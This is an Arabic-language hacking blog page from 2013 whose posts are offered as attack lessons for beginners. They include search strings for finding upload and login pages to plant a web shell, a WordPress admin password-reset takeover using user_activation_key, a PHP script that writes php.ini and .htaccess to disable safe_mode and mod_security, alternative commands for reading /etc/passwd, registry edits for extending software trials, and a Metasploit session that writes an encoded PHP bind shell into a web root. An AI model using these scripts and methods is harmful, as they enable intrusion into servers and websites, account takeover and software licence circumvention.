المشاركات الشائعة

d

Solo copea el codigo y dirigete a diseño/Html y pegas el codigo
Solo copea el codigo y dirigete a diseño/Html y pegas el codigo

لإستماع للقرأن الكريم

عدد ضيوف الموقع

sild

آخر التعليقات

الأحد، 25 أغسطس 2013

دوركات مفيده بالاستهداف داخل السيرفر

سلام عليكم حبيت اطرح درس يفيد شريحة اخواني المبتدئين الي انا منهم والدرس عن كيفية البحث داخل السيرفر عن امور مفيده في الاختراق 

البحث عن المتغيرات في السيرفر
كود PHP:
id=  
كود PHP:
php?id=  
كود PHP:
id  
كود PHP:
cat=  
الهدف من البحث عن المتغيرات انه احتمال كبير تجد ثغرات امنيه مثل

sql
lfi
upload
xss


البحث عن مراكز الرفع في السيرفر

كود PHP:
upload  
كود PHP:
upload.php  
كود PHP:
up  
كود PHP:
download  
كود PHP:
مركز رفع  
كود PHP:
مركز تحميل  
الهدف من البحث ايجاد ثغره في مركز الرفع ومن ثم رفع الشل او التلاعب بواسطة التمبرر داتا او تخمين لوحة تحكم المركز ورفع الشل من داخله

البحث عن الوورد بريس في السيرفر 

كود PHP:
wordpress  
كود PHP:
powered by wordpress  
كود PHP:
wp  
كود PHP:
blog  
كود PHP:
مدونه  
الهدف من البحث فحص الاضافات المركبه على المدونه والبحث فيها عن الثغرات الامنيه او تخمين لوحة الادمن ورفع الشل من داخلها



البحث عن الجوملا في السيرفر 

كود PHP:
powered by joomla  
كود PHP:
joomla  
كود PHP:
index.php option=  
نفس الكلام الي ذكرناه عن الوورد بريس بالضبط

البحث عن اماكن الدخول ( اللوجنات )

كود PHP:
login  
كود PHP:
login.php  
كود PHP:
admin/login.php  
كود PHP:
admin  
كود PHP:
administrator  
الهدف من البحث تخمين لوحة الدخول او ايجاد ثغره امنيه في السكربت لان غالبا هذه السكربتات تكون خاصه ومصابه ومن ثم رفع الشل

البحث عن جميع سكربتات السيرفر

كود PHP:
powered by  
كود PHP:
desighned by  
الهدف طبعا تحميل السكربت على السيرفر المحلي وفحصه او فحص الموقع الي يستخدم السكربت باي برنامج يختص بالثغرات الامنيه على الوندوز او على لينكس

البحث عن ملفات التثبيت 

كود PHP:
install  
كود PHP:
install.php  
كود PHP:
wp-admin/install.php  
الهدف : احيانا صاحب الموقع ينسى ملف تنصيب السكربت دون حذفه ويقوم الهكر باعادة تثبيت السكربت والدخول الى لوحة التحكم ومن ثم رفع الشل

البحث عن المواقع المخترقه على السيرفر 

كود PHP:
hacked by  
كود PHP:
hacked  
كود PHP:
تم الاختراق  
كود PHP:
تم الدعس  
كود PHP:
تم التطويف  
طبعا اخر دوركين كثرو منها لو السيرفر سعودي  

الهدف من ايجاد المواقع المخترقه على السيرفر محاولة كشف شلات او اب لودات او باكدورات على الموقع من خلال فحص ملفاته والاستفاده منها في اختراق الهدف

البحث عن المواقع تحت الانشاء 

كود PHP:
coming soon  
كود PHP:
Under construction  
كود PHP:
تحت الانشاء  
كود PHP:
تحت الصيانه  
الهدف احيانا مثل هالمواقع يكون باسوورد السي بنل لها قابل للكسر فيمكن تخمينه وهذا يشكل خطر على النظام بطبيعة الحال او يكون ناسي ملف التثبيت او يضع رقم سري سهل للوحة دخول السكربت او يوجد ثغره في موقعه لم ينتبه لها بحكم ان الموقع حديث الانشاء

البحث عن شركة الاستضافه داخل السيرفر 

كود PHP:
powered by whmcompletesolution  
كود PHP:
 whmcompletesolution  
كود PHP:
whm  
كود PHP:
cart.php  
طيب وش الفايده لو حصلت شركة استضافه على السيرفر !
لو حصلت اي شركة ما راح تستفيد غير استفاده محدوده من خلال البحث عن ثغرات سكربت الوهم ومحاولة الاختراق او رفع الشل

بينما !

لو حصلت نفس شركة الاستضافه الي مستاجره السيرفر على نفس السيرفر هنا بيكون كلام اخر . لان لو قدرت توصل لها احتمال تصل الى الروت ومن ثم تسيطر على السيرفر كامل

هذا ما استطعت تقديمه لكم اليوم وارجو من الله عز وجل ان يوفقني واياكم لما يحب ويرضى

السبت، 24 أغسطس 2013

طريقة تجاوز تشفير باسووردات الووردبريس


كيفكم يا حبااااااااااااااااااااايب قلبى
ان شاء الله من تقدم الى تقدم فى هذا المنتدى العريق

اطرح لكم اليوم طريقة لتجاوز تشفير باسوردات الوورد بريس المعقدة

فلنبدا على بركة الله

الطريقة بسيطة وشغالة مليون فى الميه

1- روح لرابط الادمن

http://www.example.com/wp-admin


2- اضغط على فقدان كلمة المرور او Lost your password?
3- جيب ايميل الادمن او ممكن باليوزر نيم هتلتقيه موجود فى (
موجودة بجدول wp-user)

وبعد ما تطلب كلمة المرور

اعمل ريفريش وجيب كود من العامود user_activation_key

وادخل على الرابط دا :


http://www.example.com/wp-login.php?action=rp&key=123456789&login=adminusername




طبعا
adminusername=يوزر نيم الادمن
key=الكود اللي جبته من
user_activation_key


وبكدا انت تقدر تعمل باسورد جديد للادمن

تحياتى 

اخوكم فى الله

سكريبت يتخطى حماية 70%

السلام عليكم

معي سكريبت يتخطى حماية 70%


<?
/*

Bypass ModeSecurity Exploit

*/
echo "<b><font color='green'>[+] Start...<br>\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');

if(
$bypfile and $stuffile!= NULL){

echo 
"[+] Fucking Bypass Created Succes !<br> \n";

}

else{

echo 
"<font color='red'>[-] access denial ! <br></font> \n";

}
$byprullz1="safe_mode = OFF

"
;
$byprullz2="disable_functions = NONE";
$dj=fwrite($bypfile,$byprullz1);
$dj1=fwrite($bypfile,$byprullz2);
fclose($bypfile);

if(
$dj and $dj1!= NULL){

echo 
"[+] php.ini Writed ! <br>\n";

}

else{

echo 
"<font color='red'>[-] 404 php.ini not found !<br></font> \n";

}
$breakrullz="Options Indexes FollowSymLinks
DirectoryIndex vbspiders.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>"
; // xD
$sf7=fwrite($stuffile,$breakrullz);
fclose($stuffile);

if(
$sf7!= NULL){

echo 
"<font color='green'>[+] EviL .htaccess Writing ....Done<br>\n";

echo 
"<font color='orange'>[+] Exploited Success!<br><br><br> \n\n\n";

echo 
"\t\t\t<font color='green'>[+] Edited By Aghilas -- Algeria <br>\n";
echo 
"\t\t\t<font color='green'>[+] Wr!ted By Hunter<br><br>\n";
echo 
"\t\t\t<font color='gray'> [+] somme errors was edited by aghilas  <br>\n";

echo 
"\t\t\t<font color='blue'>[+] Greetz : ALL My Friends ...\n";

}

else{

echo 
"<font color='red'>[-] Evil .htaccess Not FouNd!</font>\n";

}
system("uname -a;pwd");
#EOF
?>

Bypass cat /etc/passwd

السلام عليكم

بدون مقدمات
لو واجهت عدم قرائة الأمر
cat /etc/passwd
جرب هده الأوامر 

========================

كود:
xxd /etc/passwd
rev /etc/passwd
tac /etc/passwd
more /etc/passwdless /etc/passwd

أقوى دورة لإكتشاف ثغرات الفيض


أقوى دورة لإكتشاف ثغرات الفيض :

http://www.mediafire.com/download/ymnmiamo1wl/Basic+Stack+BOF+%3D--+Crashing+%26+exploiting+%26+make+it+universall.rar


ثغرات buffer overflow تفيد جدا في اختراق السيرفرات لانه يتم استغلال ثغرات البرامج المركبة (المصابة)


Enjoy my Friend

طريقة بسيطة لكسر البرامج التجريبيه

السلام عليكم ورحمة الله وبركاته

اليوم وانا اتصفح احدى المنتديات العربية وجدت طريقة بسيطة جدا لكسر حماية البرامج التجريبية
والاستفادة منها اكبر من المدة المحددة لها


كيف تكسر البرامج التجريبيه

كيف تستطيع أن تتحايل على البرنامج الذي يطلب له ملف كراك

تعتمد كثير من البرامج بوضع حماية على برامجها، و غالبا ما تكون هناك
فترة تجريبية للبرنامج مدة لا تتجاوز14 يوماً، و في حالة رغبة المستخدم 
بالتجديد عليه أن يشتري النسخة الاصلية، أو البحث عن ( كراك ) البرنامج
، و يقصد به الرقم التسلسي، الذي يمكنه من فتح النسخة.

فهل ترغب ان تزيد في مدة التجربة؟
فبدلا من 14 يوما ، تكون اكثر من 1400 يوم مثلا ؟ حسنا أليك الطريقه

1- اضغط على (start او ابدأ )حسب الويندوز اللي تملكه اذا كان عربي او انجليزي .
2- اختار( run )(أو تشغيل) .
3- اكتب في المربع (regedit)وبعدها اضغط على( موافق أو ok) .
4- سوف يشتغل برنامج للدخول الى سجلات الويندوز.
5- سوف تظهر لك خمسة مجلدات صفراء في الجهه اليسرى من الشاشه 
، اختر المجلد المكتوب امامه(HKEY_LOCAL_MASHINE)واضغط علامة(+) التي بجانبه .
6- سوف تظهر مجلدات كثيره بداخل المجلد المختار .
7- اختر مجلد( Software )واضغط علامة (+) التي بجانبه .
8- سوف تظهر مجلدات كثيره بداخله ، اختر مجلد (Microsoft) وبعدها مجلد (Windows) بنفس الطريقه طبعا.
9- اضغط على مجلد( Currentversion) سوف تظهر على يمين الشاشه عناصر كثيره .
10- ابحث بين العناصر عن العنصر( SSInstall) واضغط عليه بزر الفأره اليمين ثم اختر(modify).
11-ستظهر نافذه صغيره بها مربع مكتوب فيه قيمة ، واختيارين ( Hexdecimal , Deciaml ).
12 - اختر (Decimal )ستجد ان القيمه الموجوده بداخل المربع تغيرت ارقامها.
13- غير القيمه الموجوده بداخل المربع الى( 999999999 تسعة تسع مرات ).
وبعدها اضغط على (موافق) .

14- اغلق برنامج تحرير سجلات الويندوز وبعدها شغل البرنامج .

الخميس، 22 أغسطس 2013

metasploit php shell


  1.                                   _
  2.                                  | |      o
  3.  _  _  _    _ _|_  __,   ,    _  | |  __    _|_
  4. / |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  5.   |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
  6.                            /|
  7.                            \|
  8.        =[ metasploit v3.5.2-beta [core:3.5 api:1.0]
  9. + -- --=[ 644 exploits - 328 auxiliary
  10. + -- --=[ 216 payloads - 27 encoders - 8 nops
  11.        =[ svn r11722 updated 4 days ago (2011.02.08)
  12. msf > search php
  13. [*] Searching loaded modules for pattern 'php'...
  14. <--BIG SNIP-->
  15. NOP Generators
  16. ==============
  17.    Name         Disclosure Date  Rank    Description
  18.    ----         ---------------  ----    -----------
  19.    php/generic                   normal  PHP Nop Generator
  20. Payloads
  21. ========
  22.    Name                         Disclosure Date  Rank    Description
  23.    ----                         ---------------  ----    -----------
  24.    php/bind_perl                                 normal  PHP Command Shell, Bind TCP (via perl)
  25.    php/bind_php                                  normal  PHP Command Shell, Bind TCP (via php)
  26.    php/download_exec                             normal  PHP Executable Download and Execute
  27.    php/exec                                      normal  PHP Execute Command
  28.    php/meterpreter/bind_tcp                      normal  PHP Meterpreter, Bind TCP Stager
  29.    php/meterpreter/reverse_tcp                   normal  PHP Meterpreter, PHP Reverse TCP stager
  30.    php/meterpreter_reverse_tcp                   normal  PHP Meterpreter, Reverse TCP Inline
  31.    php/reverse_perl                              normal  PHP Command, Double reverse TCP connection (via perl)
  32.    php/reverse_php                               normal  PHP Command Shell, Reverse TCP (via php)
  33.    php/shell_findsock                            normal  PHP Command Shell, Find Sock
  34. msf > use php/bind_php
  35. msf payload(bind_php) > show options
  36. Module options (payload/php/bind_php):
  37.    Name   Current Setting  Required  Description
  38.    ----   ---------------  --------  -----------
  39.    LPORT  4444             yes       The listen port
  40.    RHOST                   no        The target address
  41. msf payload(bind_php) > set RHOST 192.168.1.5
  42. RHOST => 192.168.1.5
  43. msf payload(bind_php) > set LPORT 4321
  44. LPORT => 4321
  45. msf payload(bind_php) > generate -h
  46. Usage: generate [options]
  47. Generates a payload.
  48. OPTIONS:
  49.     -E        Force encoding.
  50.     -b <opt>  The list of characters to avoid: '\x00\xff'
  51.     -e <opt>  The name of the encoder module to use.
  52.     -f <opt>  The output file name (otherwise stdout)
  53.     -h        Help banner.
  54.     -i <opt>  the number of encoding iterations.
  55.     -k        Keep the template executable functional
  56.     -o <opt>  A comma separated list of options in VAR=VAL format.
  57.     -p <opt>  The Platform for output.
  58.     -s <opt>  NOP sled length.
  59.     -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
  60.     -x <opt>  The executable template to use
  61. msf payload(bind_php) > generate -t raw -e php/base64
  62. eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
  63. msf payload(bind_php) > exit
  64. root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.php

    sec-worldweb.blogspot.com